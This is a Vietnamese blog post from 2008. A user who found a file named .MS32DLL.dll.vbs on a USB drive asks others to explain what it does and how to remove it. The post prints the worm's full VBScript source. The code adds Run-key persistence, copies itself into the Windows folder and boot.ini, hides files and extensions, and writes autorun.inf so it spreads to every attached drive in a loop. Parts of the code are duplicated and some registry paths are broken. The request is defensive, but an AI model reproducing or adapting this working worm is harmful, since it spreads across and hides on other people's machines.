Portfolio
My Blog
Scroll down to discover
Search
Categories

Virut MS32Dll USB

June 10, 2008Category : Virut/Trojan

tên file : .MS32DLL.dll.vbs
nó dính vô usb flash, kèm theo file autorun.inf và printer.exe
các anh phân tích cho em tác dụng (tác hại) của nó với, cả cách khắc phục luôn.
nội dung :

‘mark
‘slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc, hm
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe .MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject(“WScript.Shell”)
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,”0″
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL”,winpath&”\.MS32DLL.dll.vb s”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\winboot”,”wscript.exe “&winpath&”\boot.ini”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveTypeAutoRun”,0 ,”REG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden”,1,”REG_D WORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden”,0,”R EG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\HideFileExt”,”1″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden”,”1″
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\.MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\.MS32DLL.dll.vbs”,2,true)
tf.write “‘ker”&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & “\.MS32DLL.dll.vbs”)
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\boot.ini”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\boot.ini”,2,true)
tf.write “‘ker”&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & “\boot.ini”)
tf.attributes = 39
if cc = “‘mark” then
rg.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
end if
if cc = “‘marker” then
rg.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm=”‘mark”
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> “A:” then
if(flashdrive.drivetype=2) then
hm = “‘marker”
end if
set tf=fs.getfile(flashdrive.path &”\.MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\.MS32DLL.dll.vbs”,2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\.MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,”0″
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL”,winpath&”\.MS32DLL.dll.vb s”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\winboot”,”wscript.exe /E:vbs “&winpath&”\boot.ini”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveTypeAutoRun”,0 ,”REG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden”,1,”REG_D WORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden”,0,”R EG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\HideFileExt”,”1″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden”,”1″
next
if cc <> “‘mark” then
Wscript.sleep 10000
end if
loop while cc <> “‘mark”
ript.ScriptFullname
end if
if cc = “‘marker” then
rg.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm=”‘mark”
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> “A:” then
if(flashdrive.drivetype=2) then
hm = “‘marker”
end if
set tf=fs.getfile(flashdrive.path &”\.MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\.MS32DLL.dll.vbs”,2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\.MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,”0″
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL”,winpath&”\.MS32DLL.dll.vb s”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\winboot”,”wscript.exe /E:vbs “&winpath&”\boot.ini”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveTypeAutoRun”,0 ,”REG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden”,1,”REG_D WORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden”,0,”R EG_DWORD”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\HideFileExt”,”1″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden”,”1″
next
if cc <> “‘mark” then
Wscript.sleep 10000
end if
loop while cc <> “‘mark”

còn nữa nhưng ko đọc đc toàn ô vuông và đc lặp lại nhiều lần với nội dung như trên

01.
© Oliver / All rights reserved.
To top